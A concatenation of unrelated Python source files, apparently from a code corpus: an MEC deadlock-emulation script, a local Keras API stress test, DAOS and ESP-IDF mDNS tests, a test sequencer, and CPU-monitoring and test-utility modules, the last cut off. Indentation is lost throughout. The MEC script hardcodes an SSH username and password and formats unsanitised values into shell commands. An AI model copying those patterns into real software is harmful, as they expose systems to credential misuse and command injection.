# msg = 'Attendance done for {}'.format(_timer)
_message = 'Subject: {}\n\n{}\n\n SENT BY RIHANNA \n\n'.format(subject, msg)
server.sendmail(config.email_address, config.send_email, _message)
server.quit()
print("Email sent!")
except Exception as e:
print(e)
def send_offloaded_task_mec(msg):
_multicast_group = ('224.5.5.55', 20000)
try:
sock2.sendto(str.encode(msg), _multicast_group)
except Exception as e:
print(e)
def mec_id(client_ip):
_id = client_ip.split('.')[-1]
if len(_id) == 1:
return '00' + _id
elif len(_id) == 2:
return '0' + _id
else:
return _id
def send_result(host_, data):
try:
c = paramiko.SSHClient()
un = 'mec'
pw = 'password'
port = 22
c.set_missing_host_key_policy(paramiko.AutoAddPolicy())
c.connect(host_, port, un, pw)
for i in data:
cmd = ('echo "{}" >> /home/mec/result/data.py'.format(i)) # task share : host ip task
stdin, stdout, stderr = c.exec_command(cmd)
except Exception as e:
print(e)
def save_and_send(send_path):
_id_ = get_hostname()[-1]
result = f"\nwt{_id_}_7_{mec_no} = {mec_waiting_time} " \
f"\nrtt{_id_}_7_{mec_no} = {mec_rtt} \ncpu{_id_}_7_{mec_no} = {_cpu} " \
f"\noff_mec{_id_}_7_{mec_no} = {_off_mec} " \
f"\noff_cloud{_id_}_7_{mec_no} = {_off_cloud} " \
f"\ninward_mec{_id_}_7_{mec_no} = {_inward_mec}" \
f"\nloc{_id_}_7_{mec_no} = {_loc} " \
f"\ndeadlock{_id_}_7_{mec_no} = {deadlock} \nmemory{_id_}_7_{mec_no} = {memory}" \
f"\ntask_received = {total_received_task} \nsent_t = {clients_record}" \
f"\ncooperate{_id_}_7_{mec_no} = {cooperate} \ntask_record{_id_}_7_{mec_no} = {task_record}" \
f"\noutward_mec{_id_}_7_{mec_no} = {outward_mec}" \
f"\noffload_check{_id_}_7_{mec_no} = {offload_check}"
list_result = [
f"\nwt{_id_}_7_{mec_no} = {mec_waiting_time} ",
f"\nrtt{_id_}_7_{mec_no} = {mec_rtt} \ncpu{_id_}_7_{mec_no} = {_cpu} ",
f"\noff_mec{_id_}_7_{mec_no} = {_off_mec} \noff_cloud{_id_}_7_{mec_no} = {_off_cloud} ",
f"\ninward_mec{_id_}_7_{mec_no} = {_inward_mec}",
f"\nloc{_id_}_7_{mec_no} = {_loc} ",
f"\ndeadlock{_id_}_7_{mec_no} = {deadlock} \nmemory{_id_}_7_{mec_no} = {memory}",
f"\ntask_received{_id_}_7_{mec_no} = {total_received_task} \nsent_t{_id_}_7_{mec_no} = {clients_record}",
f"\ncooperate{_id_}_7_{mec_no} = {cooperate} \ntask_record{_id_}_7_{mec_no} = {task_record} "
f"\noutward_mec{_id_}_7_{mec_no} = {outward_mec}",
f"\noffload_check{_id_}_7_{mec_no} = {offload_check}",
]
path_ = 'data/raw/'
if os.path.exists(path_):
cmd = f"echo '' > {path_}{_id_}_7_{mec_no}datal.py"
os.system(cmd)
cmd = f"echo '' > {path_}{_id_}_7_{mec_no}datap.py"
os.system(cmd)
else:
os.system(f'mkdir -p {path}')
cmd = f"echo '' > {path_}{_id_}_7_{mec_no}datal.py"
os.system(cmd)
cmd = f"echo '' > {path_}{_id_}_7_{mec_no}datap.py"
os.system(cmd)
file_ = open(f'{path_}{_id_}_7_{mec_no}datap.py', 'w')
for i in list_result:
file_.write(i)
file_.close()
sp.run(
["scp", f"{path_}{_id_}_7_{mec_no}datap.py", f"mec@{hosts['osboxes-0']}:{send_path}"])
send_result(hosts['osboxes-0'], list_result)
send_email(result, send_path)
if len(task_record) > 0:
for _task_ in task_record:
task_new = '.'.join(_task_.split('.')[:-1])
_client.publish(task_new.split('.')[2], str({task_new: get_time() + [task_record[_task_]]}), )
run = 1 # tell agents child when to stop
def start_loop():
global _loc
global tasks
global t_time
global node_id
global run
print('\n============* WELCOME TO THE DEADLOCK EMULATION PROGRAM *=============\n')
node_id = mec_id(ip_address())
# print('node id: ', node_id)
func_to_thread = [receive_message, receive_offloaded_task_mec, call_execute_re_offload, connect_to_broker]
threads_ = []
stop = False
for i in func_to_thread:
threads_.append(Thread(target=i, args=(lambda: stop,)))
threads_[-1].daemon = True
threads_[-1].start()
print('algorithm is starting....')
print('========= Waiting for tasks ==========')
while run == 1:
try:
if len(received_task_queue) > 0:
info = received_task_queue.pop(0)
tasks, t_time = info
print('EDF List of Processes: ', tasks, '\n')
print('\n========= Running Deadlock Algorithm ===========')
lcm_result, task_load = load_tasks()
list_seq = get_exec_seq(scheduler(lcm_result, task_load))
if len(list_seq) > 0: # do only when there is a task in safe sequence
wait_list = calc_wait_time(list_seq)
print('\nWaiting Time List: ', wait_list)
compare_result = compare_local_mec(wait_list)
print('\nExecute Locally: ', compare_result[1])
_loc += len(compare_result[1]) # total number of tasks to be executed locally
print('\nExecute in MEC: ', compare_result[0])
print('\nSending to cooperative platform')
if len(compare_result[0]) > 0:
cooperative_mec(compare_result[0])
execute(compare_result[1])
generate_results()
_time_ = dt.datetime.now()
else:
send_message(str('wt {} 0.0'.format(ip_address())))
time.sleep(.4)
except KeyboardInterrupt:
print('\nProgramme Terminated')
stop = False
cmd = 'kill -9 {}'.format(os.getpid())
os.system(cmd)
print('done')
# os.system('kill -9 {}'.format(os.getpid()))
break
print('algo stopped!')
def run_me(hosts_, mec_no_, cloud_ip_, send_path, broker_ip_): # call this from agent
global discovering
global hosts
global mec_no
global host_ip
global cloud_ip
global my_algo
global broker_ip
print('mec ip: ', ip_address())
my_algo = psutil.Process()
discovering_group()
offloading_group()
host_ip_set()
hosts = hosts_
mec_no = mec_no_
cloud_ip = cloud_ip_
broker_ip = broker_ip_
host_ip = ip_address()
print('MEC Details: ', hosts)
discovering = 1
time.sleep(2)
for host in hosts:
if hosts[host] != host_ip:
mec_rtt[hosts[host]] = []
start_loop()
print('saving data')
save_and_send(send_path)
print('send alert to control')
time.sleep(r.uniform(1, 30))
_client.publish('control/control', pickle.dumps(['stop', ip_address()]))
print('Terminating process')
cmd = 'kill -9 {}'.format(os.getpid())
os.system(cmd)
def main():
# (hosts_, mec_no_, cloud_ip_, send_path, broker_ip_)
parser = argparse.ArgumentParser()
parser.add_argument('--hosts', type=str, help="{hostname: 'ip address', ...} of all mec")
parser.add_argument('--mec_no', type=int, default=1.0, help='Number of MEC nodes')
parser.add_argument('--cloud_ip', type=str, help="cloud ip address")
parser.add_argument('--s_path', type=str, default='/home/mec/result/python', help='Path to send result to')
parser.add_argument('--b_ip', type=str, help='Broker ip address')
args = parser.parse_args()
h_hosts = ast.literal_eval(args.hosts)
run_me(hosts_=h_hosts, mec_no_=args.mec_no, cloud_ip_=args.cloud_ip, send_path=args.s_path, broker_ip_=args.b_ip)
if __name__ == '__main__':
main()
|
stress_test.py
|
"""
Stress test for server
.. code-block:: bash
python stress_test.py
"""
# import the necessary packages
from threading import Thread
import requests
import time
# initialize the Keras REST API endpoint URL along with the input
# image path
KERAS_REST_API_URL = "http://localhost/predict"
IMAGE_PATH = "jemma.png"
# initialize the number of requests for the stress test along with
# the sleep amount between requests
NUM_REQUESTS = 500
SLEEP_COUNT = 0.05
def call_predict_endpoint(n):
"""
call the predication api
Args:
n: ``int``
called number
"""
# load the input image and construct the payload for the request
image = open(IMAGE_PATH, "rb").read()
payload = {"image": image}
# submit the request
r = requests.post(KERAS_REST_API_URL, files=payload).json()
# ensure the request was sucessful
if r["success"]:
print("[INFO] thread {} OK".format(n))
# otherwise, the request failed
else:
print("[INFO] thread {} FAILED".format(n))
# loop over the number of threads
for i in range(0, NUM_REQUESTS):
# start a new thread to call the API
t = Thread(target=call_predict_endpoint, args=(i,))
t.daemon = True
t.start()
time.sleep(SLEEP_COUNT)
# insert a long sleep so we can wait until the server is finished
# processing the images
time.sleep(300)
|
osa_online_drain.py
|
#!/usr/bin/python
"""
(C) Copyright 2020-2021 Intel Corporation.
SPDX-License-Identifier: BSD-2-Clause-Patent
"""
import time
import random
import threading
from write_host_file import write_host_file
from osa_utils import OSAUtils
from daos_utils import DaosCommand
from apricot import skipForTicket
class OSAOnlineDrain(OSAUtils):
# pylint: disable=too-many-ancestors
"""
Test Class Description: This test runs
daos_server Online Drain test cases.
:avocado: recursive
"""
def setUp(self):
"""Set up for test case."""
super().setUp()
self.dmg_command = self.get_dmg_command()
self.daos_command = DaosCommand(self.bin)
self.ior_test_sequence = self.params.get(
"ior_test_sequence", '/run/ior/iorflags/*')
self.test_oclass = self.params.get("oclass", '/run/test_obj_class/*')
# Recreate the client hostfile without slots defined
self.hostfile_clients = write_host_file(
self.hostlist_clients, self.workdir, None)
self.pool = None
self.dmg_command.exit_status_exception = True
def run_online_drain_test(self, num_pool, oclass=None, app_name="ior"):
"""Run the Online drain without data.
Args:
num_pool(int) : total pools to create for testing purposes.
oclass(str) : Object class type (RP_2G1, etc)
app_name(str) : application to run on parallel (ior or mdtest)
Defaults to ior.
"""
# Create a pool
self.pool = []
target_list = []
if oclass is None:
oclass = self.ior_cmd.dfs_oclass.value
test_seq = self.ior_test_sequence[0]
drain_servers = (len(self.hostlist_servers) * 2) - 1
# Exclude target : random two targets (target idx : 0-7)
n = random.randint(0, 6)
target_list.append(n)
target_list.append(n+1)
t_string = "{},{}".format(target_list[0], target_list[1])
# Drain one of the ranks (or server)
rank = random.randint(1, drain_servers)
for val in range(0, num_pool):
self.pool.append(self.get_pool())
self.pool[-1].set_property("reclaim", "disabled")
# Drain the rank and targets
for val in range(0, num_pool):
threads = []
# Instantiate aggregation
if self.test_during_aggregation is True:
for _ in range(0, 2):
self.run_ior_thread("Write", oclass, test_seq)
self.delete_extra_container(self.pool[val])
# The following thread runs while performing osa operations.
if app_name == "ior":
threads.append(threading.Thread(target=self.run_ior_thread,
kwargs={"action": "Write",
"oclass": oclass,
"test": test_seq}))
else:
threads.append(threading.Thread(target=self.run_mdtest_thread))
# Launch the IOR threads
for thrd in threads:
self.log.info("Thread : %s", thrd)
thrd.start()
time.sleep(1)
# Wait the threads to write some data before drain.
time.sleep(5)
self.pool[val].display_pool_daos_space("Pool space: Beginning")
pver_begin = self.get_pool_version()
self.log.info("Pool Version at the beginning %s", pver_begin)
output = self.dmg_command.pool_drain(
self.pool[val].uuid, rank, t_string)
self.print_and_assert_on_rebuild_failure(output)
pver_drain = self.get_pool_version()
self.log.info("Pool Version after drain %s", pver_drain)
# Check pool version incremented after pool exclude
self.assertTrue(pver_drain > pver_begin,
"Pool Version Error: After drain")
# Wait to finish the threads
for thrd in threads:
thrd.join()
if not self.out_queue.empty():
self.assert_on_exception()
for val in range(0, num_pool):
display_string = "Pool{} space at the End".format(val)
self.pool[val].display_pool_daos_space(display_string)
self.run_ior_thread("Read", oclass, test_seq)
self.container = self.pool_cont_dict[self.pool[val]][0]
kwargs = {"pool": self.pool[val].uuid,
"cont": self.container.uuid}
output = self.daos_command.container_check(**kwargs)
self.log.info(output)
@skipForTicket("DAOS-7289")
def test_osa_online_drain(self):
"""Test ID: DAOS-4750
Test Description: Validate Online drain with checksum
enabled.
:avocado: tags=all,pr,daily_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=osa,checksum
:avocado: tags=osa_drain,online_drain,online_drain_with_csum
"""
self.log.info("Online Drain : With Checksum")
self.run_online_drain_test(1)
@skipForTicket("DAOS-7289")
def test_osa_online_drain_no_csum(self):
"""Test ID: DAOS-6909
Test Description: Validate Online drain without enabling
checksum.
:avocado: tags=all,pr,full_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=osa
:avocado: tags=osa_drain,online_drain,online_drain_without_csum
"""
self.log.info("Online Drain : No Checksum")
self.test_with_checksum = self.params.get("test_with_checksum",
'/run/checksum/*')
self.run_online_drain_test(1)
@skipForTicket("DAOS-7289")
def test_osa_online_drain_oclass(self):
"""Test ID: DAOS-6909
Test Description: Validate Online drain with different
object class.
:avocado: tags=all,pr,full_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=osa,checksum
:avocado: tags=osa_drain,online_drain,online_drain_oclass
"""
self.log.info("Online Drain : Oclass")
for oclass in self.test_oclass:
self.run_online_drain_test(1, oclass=oclass)
@skipForTicket("DAOS-7289")
def test_osa_online_drain_with_aggregation(self):
"""Test ID: DAOS-6909
Test Description: Validate Online drain with different
object class.
:avocado: tags=all,pr,full_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=osa,checksum
:avocado: tags=osa_drain,online_drain,online_drain_with_aggregation
"""
self.log.info("Online Drain : Aggregation")
self.test_during_aggregation = self.params.get("test_with_aggregation",
'/run/aggregation/*')
self.run_online_drain_test(1)
@skipForTicket("DAOS-7289")
def test_osa_online_drain_mdtest(self):
"""Test ID: DAOS-4750
Test Description: Validate Online drain with mdtest
running during the testing.
:avocado: tags=all,pr,daily_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=osa,checksum
:avocado: tags=osa_drain,online_drain,online_drain_mdtest
"""
self.log.info("Online Drain : With Mdtest")
self.run_online_drain_test(1, app_name="mdtest")
|
iris.py
|
#! /usr/bin/python
"""
Test sequencer for any production testing
"""
import os
import argparse
import sys
import threading
from queue import Queue
from test_runner import runner
import listener.listener as listener
import logging
import tornado
import json
import pathlib
import yaml
import logging.config
PORT = 4321
PARSER = argparse.ArgumentParser(description="Iris test sequencer.")
PARSER.add_argument("--single_run", "-s", help="Run only once", action="store_true")
PARSER.add_argument(
"--create",
"-c",
metavar='path',
type=str,
nargs=1,
help="Creates empty/example test COMMON_definitions",
)
PARSER.add_argument("--report_off", "-r", help="Don't create test report", action="store_true")
PARSER.add_argument(
"--listener",
"-l",
help="Creates HTTP listener. Testing is then started through REST API.",
action="store_true",
)
PARSER.add_argument(
"-d",
"--dry-run",
help="Replaces instruments with mock objects.",
action="store_true",
)
PARSER.add_argument(
"-m",
"--mock",
help=r"""Replaces listed instruments with mock objects. Usage: iris.py -m INSTRUMENT1 INSTRUMENT2 ...""",
nargs='+'
)
PARSER.add_argument(
"-i",
"--inverse-mock",
help=r"""Replaces all but listed instruments with mock objects. Usage: iris.py -m INSTRUMENT1 INSTRUMENT2 ...""",
nargs='+'
)
PARSER.add_argument(
"-v",
"--verbose",
help="Increase output verbosity. Sets root logger to debug level.",
action="store_true",
)
PARSER.add_argument(
"-b",
"--no-browser",
help="Don't try to open web browser.",
action="store_true",
)
PARSER.add_argument(
"--list-applications",
"-a",
help="Lists available application on the connected Gaia tester (G5 or other). Gaia instrument must be defined and available.",
action="store_true",
)
PARSER.add_argument('-p', '--port', help="Set port to listen", type=int)
ARGS = PARSER.parse_args()
LOG_SETTINGS_FILE = pathlib.Path('test_definitions/common/logging.yaml')
if LOG_SETTINGS_FILE.is_file():
with LOG_SETTINGS_FILE.open() as _f:
LOG_CONF = yaml.safe_load(_f.read())
pathlib.Path(LOG_CONF['log_file_path']).mkdir(parents=True, exist_ok=True)
logging.config.dictConfig(LOG_CONF)
logging.info('Logging with configuration from %s', LOG_SETTINGS_FILE)
else:
logging.basicConfig(level=logging.INFO)
logging.warning('Cannot find logging settings. Logging with basicConfig.')
if ARGS.verbose:
logging.getLogger().setLevel(logging.DEBUG)
LOGGER = logging.getLogger(__name__)
LOGGER.debug("Logging initialized")
LOGGER.info("Logging initialized")
if ARGS.create:
from distutils.dir_util import copy_tree
from test_definition_template.sequences import example_sequence
from test_definition_template import test_case_pool
TEST_DEF_PATH = os.path.join("./test_definitions/sequences", ARGS.create[0])
if os.path.isdir(TEST_DEF_PATH):
LOGGER.warning("Test sequence " + ARGS.create[0] + " already exists")
sys.exit(-1)
copy_tree(example_sequence.__path__[0], TEST_DEF_PATH)
copy_tree(test_case_pool.__path__[0], './test_definitions/test_case_pool')
if not os.path.isdir('./test_definitions/common'):
from test_definition_template import common
copy_tree(common.__path__[0], './test_definitions/common')
import additional_dist_files
from shutil import copyfile
copyfile(additional_dist_files.__path__[0] + '/Dockerfile', './Dockerfile')
copyfile(additional_dist_files.__path__[0] + '/docker-compose.yml', './docker-compose.yml')
else:
LOGGER.info('./test_definitions/common already exists. Not copying it.')
sys.exit(0)
CONTROL = runner.get_test_control(LOGGER)
COMMON_DEFINITIONS = runner.get_common_definitions()
SETTINGS_FILE = pathlib.Path('station_settings.yaml')
if SETTINGS_FILE.is_file():
with SETTINGS_FILE.open() as _f:
COMMON_DEFINITIONS.SETTINGS = yaml.safe_load(_f.read())
if ARGS.list_applications:
# Print available applications and actions
class GaiaJsonEncoder(json.JSONEncoder):
'''Encode json properly'''
def default(self, obj):
if callable(obj):
return obj.__name__
# Let the base class default method raise the TypeError
return json.JSONEncoder.default(self, obj)
# Todo: Initialization not working like this anymore
COMMON_DEFINITIONS.instrument_initialization()
client = COMMON_DEFINITIONS.INSTRUMENTS['gaia']
print(json.dumps(client.applications, indent=4, sort_keys=True, cls=GaiaJsonEncoder))
print(json.dumps(client.state_triggers, indent=4, sort_keys=True, cls=GaiaJsonEncoder))
sys.exit()
CONTROL['run'].set()
if ARGS.dry_run:
CONTROL['dry_run'] = True
if ARGS.mock:
CONTROL['mock'] = ARGS.mock
if ARGS.inverse_mock:
CONTROL['inverse_mock'] = ARGS.inverse_mock
if ARGS.single_run:
CONTROL['single_run'] = True
if ARGS.report_off:
CONTROL['report_off'] = True
DUT_SN_QUEUE = Queue()
MESSAGE_QUEUE = Queue()
PROGRESS_QUEUE = Queue()
LISTENER_ARGS = {'database': None, 'download_path': None}
if hasattr(COMMON_DEFINITIONS, 'listener_args'):
COMMON_DEFINITIONS.listener_args(LISTENER_ARGS)
RUNNER_THREAD = threading.Thread(
target=runner.run_test_runner,
args=(CONTROL, MESSAGE_QUEUE, PROGRESS_QUEUE, DUT_SN_QUEUE, LISTENER_ARGS),
name='test_runner_thread',
)
RUNNER_THREAD.daemon = True
RUNNER_THREAD.start()
class MessageHandler:
def __init__(self, message_queue, message_handler):
while True:
msg = message_queue.get()
for handler in message_handler:
handler(msg)
MESSAGE_HANDLER = []
# If you want to also print message, add print handler like this:
# MESSAGE_HANDLER = [print]
MESSAGE_THREAD = threading.Thread(
target=MessageHandler, args=(MESSAGE_QUEUE, MESSAGE_HANDLER), name='message_thread'
)
PROGRESS_HANDLER = []
# If you want to also print message, add print handler like this:
# PROGRESS_HANDLER = [print]
PROGRESS_THREAD = threading.Thread(
target=MessageHandler, args=(PROGRESS_QUEUE, PROGRESS_HANDLER), name='progress_thread'
)
PROGRESS_THREAD.daemon = True
MESSAGE_THREAD.daemon = True
PROGRESS_THREAD.start()
MESSAGE_THREAD.start()
if ARGS.listener:
if ARGS.port:
PORT = ARGS.port
if not ARGS.no_browser:
import webbrowser
webbrowser.open("http://localhost:" + str(PORT))
listener.create_listener(
PORT,
CONTROL,
MESSAGE_HANDLER,
PROGRESS_HANDLER,
COMMON_DEFINITIONS,
DUT_SN_QUEUE,
LISTENER_ARGS,
)
tornado.ioloop.IOLoop.current().start()
# MESSAGE_HANDLER = print
RUNNER_THREAD.join()
|
spinning_cursor.py
|
"""
source: https://stackoverflow.com/questions/4995733/how-to-create-a-spinning-command-line-cursor
"""
import sys
import time
import threading
class Spinner:
busy = False
delay = 0.01
@staticmethod
def spinning_cursor():
while 1:
for cursor in '|/-\\': yield cursor
def __init__(self, delay=None):
self.spinner_generator = self.spinning_cursor()
if delay and float(delay): self.delay = delay
def spinner_task(self):
while self.busy:
sys.stdout.write(next(self.spinner_generator))
sys.stdout.flush()
time.sleep(self.delay)
sys.stdout.write('\b')
sys.stdout.flush()
def __enter__(self):
self.busy = True
threading.Thread(target=self.spinner_task).start()
def __exit__(self, exception, value, tb):
self.busy = False
time.sleep(self.delay)
if exception is not None:
return False
|
mdns_example_test.py
|
import re
import os
import sys
import socket
import time
import struct
import dpkt
import dpkt.dns
from threading import Thread, Event
# this is a test case write with tiny-test-fw.
# to run test cases outside tiny-test-fw,
# we need to set environment variable `TEST_FW_PATH`,
# then get and insert `TEST_FW_PATH` to sys path before import FW module
try:
import IDF
except ImportError:
test_fw_path = os.getenv("TEST_FW_PATH")
if test_fw_path and test_fw_path not in sys.path:
sys.path.insert(0, test_fw_path)
import IDF
import DUT
stop_mdns_server = Event()
esp_answered = Event()
def get_dns_query_for_esp(esp_host):
dns = dpkt.dns.DNS(b'\x00\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x01')
dns.qd[0].name = esp_host + u'.local'
print("Created query for esp host: {} ".format(dns.__repr__()))
return dns.pack()
def get_dns_answer_to_mdns(tester_host):
dns = dpkt.dns.DNS(b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00')
dns.op = dpkt.dns.DNS_QR | dpkt.dns.DNS_AA
dns.rcode = dpkt.dns.DNS_RCODE_NOERR
arr = dpkt.dns.DNS.RR()
arr.cls = dpkt.dns.DNS_IN
arr.type = dpkt.dns.DNS_A
arr.name = tester_host
arr.ip = socket.inet_aton('127.0.0.1')
dns. an.append(arr)
print("Created answer to mdns query: {} ".format(dns.__repr__()))
return dns.pack()
def mdns_server(esp_host):
global esp_answered
UDP_IP = "0.0.0.0"
UDP_PORT = 5353
MCAST_GRP = '224.0.0.251'
TESTER_NAME = u'tinytester.local'
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
sock.bind((UDP_IP,UDP_PORT))
mreq = struct.pack("4sl", socket.inet_aton(MCAST_GRP), socket.INADDR_ANY)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
sock.settimeout(30)
while not stop_mdns_server.is_set():
try:
if not esp_answered.is_set():
sock.sendto(get_dns_query_for_esp(esp_host), (MCAST_GRP,UDP_PORT))
time.sleep(0.2)
data, addr = sock.recvfrom(1024)
dns = dpkt.dns.DNS(data)
if len(dns.qd) > 0 and dns.qd[0].type == dpkt.dns.DNS_A:
if dns.qd[0].name == TESTER_NAME:
print("Received query: {} ".format(dns.__repr__()))
sock.sendto(get_dns_answer_to_mdns(TESTER_NAME), (MCAST_GRP,UDP_PORT))
if len(dns.an) > 0 and dns.an[0].type == dpkt.dns.DNS_A:
if dns.an[0].name == esp_host + u'.local':
print("Received answer to esp32-mdns query: {}".format(dns.__repr__()))
esp_answered.set()
except socket.timeout:
break
except dpkt.UnpackError:
continue
@IDF.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_mdns(env, extra_data):
global stop_mdns_server
"""
steps: |
1. join AP + init mdns example
2. get the dut host name (and IP address)
3. check the mdns name is accessible
4. check DUT output if mdns advertized host is resolved
"""
dut1 = env.get_dut("mdns-test", "examples/protocols/mdns")
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, "mdns-test.bin")
bin_size = os.path.getsize(binary_file)
IDF.log_performance("mdns-test_bin_size", "{}KB".format(bin_size // 1024))
IDF.check_performance("mdns-test_bin_size", bin_size // 1024)
# 1. start mdns application
dut1.start_app()
# 2. get the dut host name (and IP address)
specific_host = dut1.expect(re.compile(r"mdns hostname set to: \[([^\]]+)\]"), timeout=30)
specific_host = str(specific_host[0])
thread1 = Thread(target=mdns_server, args=(specific_host,))
thread1.start()
try:
try:
dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
# 3. check the mdns name is accessible
if not esp_answered.wait(timeout=30):
raise ValueError('Test has failed: did not receive mdns answer within timeout')
# 4. check DUT output if mdns advertized host is resolved
dut1.expect(re.compile(r"mdns-test: Query A: tinytester.local resolved to: 127.0.0.1"), timeout=30)
finally:
stop_mdns_server.set()
thread1.join()
if __name__ == '__main__':
test_examples_protocol_mdns()
|
lib_raise_cpu.py
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# This file is part of Raise.
# Raise is a small build automation tool that ships with your software.
# Raise uses a MIT style license, and is hosted at https://github.com/workhorsy/raise .
# Copyright (c) 2012-2017 Matthew Brennan Jones <matthew.brennan.jones@gmail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import sys, os, re
import subprocess
import threading
import atexit
import lib_raise_helpers as Helpers
import lib_raise_config as Config
import lib_raise_users as Users
import osinfo
import cpuinfo
import findlib
arch = None
bits = None
mhz = None
name = None
vendor_name = None
flags = []
cpus_total = None
cpus_free = None
cpu_utilization = 0.0
utilization_thread = None
is_utilization_thread_running = False
def _get_utilization_thread():
global cpu_utilization
global is_utilization_thread_running
is_utilization_thread_running = True
while is_utilization_thread_running:
# Get the cpu percentages
speed = 0
out = None
if Config.os_type in osinfo.OSType.Linux or Config.os_type in osinfo.OSType.Cygwin:
command = 'top -b -n 2 -d 1'
out = findlib.run_and_get_stdout(command)
# Get the cpu percentages
out = out.split("%Cpu(s):")[2]
out = out.split('\n')[0]
out = out.split(',')
# Add the percentages to get the real cpu usage
speed = \
float(out[0].split('us')[0]) + \
float(out[1].split('sy')[0]) + \
float(out[2].split('ni')[0])
elif Config.os_type in osinfo.OSType.BSD:
command = 'top -b -P -s 2 -d 2'
out = findlib.run_and_get_stdout(command)
# Get the cpu percentages
out = out.split("CPU:")[1]
out = out.split('\n')[0]
out = out.split(',')
# Add the percentages to get the real cpu usage
speed = \
float(out[0].split('% user')[0]) + \
float(out[1].split('% nice')[0]) + \
float(out[2].split('% system')[0])
elif Config.os_type in osinfo.OSType.MacOS:
command = 'top -F -l 2 -i 2 -n 0'
out = findlib.run_and_get_stdout(command)
# Get the cpu percentages
out = out.split("CPU usage:")[2]
out = out.split('\n')[0]
out = out.split(',')
# Add the percentages to get the real cpu usage
speed = \
float(out[0].split('% user')[0]) + \
float(out[1].split('% sys')[0])
elif Config.os_type in osinfo.OSType.Solaris:
command = 'top -b -s 2 -d 2'
out = findlib.run_and_get_stdout(command)
# Get the cpu percentages
out = out.split("CPU states: ")[2]
out = out.split('\n')[0]
out = out.split(',')
# Add the percentages to get the real cpu usage
speed = \
float(out[0].split('% user')[0]) + \
float(out[1].split('% nice')[0]) + \
float(out[2].split('% kernel')[0])
elif Config.os_type in osinfo.OSType.BeOS:
command = 'top -d -i 2 -n 2'
out = findlib.run_and_get_stdout(command)
# Get the cpu percentages
out = out.split("------")[1]
out = out.split('% TOTAL')[0]
out = out.split()
# Add the percentages to get the real cpu usage
speed = float(out[-1])
elif Config.os_type in osinfo.OSType.Windows:
command = 'wmic cpu get loadpercentage'
out = findlib.run_and_get_stdout(command)
# Get the cpu percentages
out = out.split()[-1]
# Add the percentages to get the real cpu usage
speed = float(out)
cpu_utilization = speed
def get_utilization():
global cpu_utilization
return cpu_utilization
def start_get_utilization_thread():
global utilization_thread
utilization_thread = threading.Thread(target=_get_utilization_thread, args=())
utilization_thread.daemon = True
utilization_thread.start()
def setup():
global arch
global bits
global mhz
global name
global vendor_name
global flags
global cpus_total
global cpus_free
info = cpuinfo.get_cpu_info()
# Make sure to show an error if we can't get any CPU info
if not info:
Config.early_exit('Failed to get CPU info.')
# Make sure to show an error if we could not get the CPU arch or bits
if not info['arch'] or not info['bits']:
Config.early_exit('Unknown CPU architecture "{0}".'.format(info['raw_arch_string']))
# Get the CPU arch
arch = info['arch']
# Get the CPU bits
bits = info['bits']
# Get the CPU MHz
mhz = info['hz_advertised']
# Get the CPU name
name = info['brand']
# Get the CPU vendor name
vendor_name = info['vendor_id']
# Get the CPU features
flags = info['flags']
# Figure out how many cpus there are
cpus_total = info['count']
cpus_free = cpus_total
start_get_utilization_thread()
def exit_module():
global utilization_thread
global is_utilization_thread_running
if is_utilization_thread_running and utilization_thread:
is_utilization_thread_running = False
utilization_thread.join()
utilization_thread = None
setup()
atexit.register(exit_module)
|
test_utils.py
|
"""Utilities shared by tests."""
import collections
import contextlib
import io
import logging
import os
import re
import socket
import sys
import tempfile
import threading
import time
from wsgiref.simple_server import WSGIRequestHandler, WSGIServer
try:
import socketserver
from http.server import HTTPServer
except ImportError:
# Python 2
import SocketServer as socketserver
from BaseHTTPServer import HTTPServer
try:
from unittest import mock
except ImportError:
# Python < 3.3
import mock
try:
import ssl
from .py3_ssl import SSLContext, wrap_socket
except ImportError: # pragma: no cover
# SSL support disabled in Python
ssl = None
from . import base_events
from . import compat
from . import events
from . import futures
from . import selectors
from . import tasks
from .coroutines import coroutine
from .log import logger
if sys.platform == 'win32': # pragma: no cover
from .windows_utils import socketpair
else:
from socket import socketpair # pragma: no cover
try:
# Prefer unittest2 if available (on Python 2)
import unittest2 as unittest
except ImportError:
import unittest
skipIf = unittest.skipIf
skipUnless = unittest.skipUnless
SkipTest = unittest.SkipTest
if not hasattr(unittest.TestCase, 'assertRaisesRegex'):
class _BaseTestCaseContext:
def __init__(self, test_case):
self.test_case = test_case
def _raiseFailure(self, standardMsg):
msg = self.test_case._formatMessage(self.msg, standardMsg)
raise self.test_case.failureException(msg)
class _AssertRaisesBaseContext(_BaseTestCaseContext):
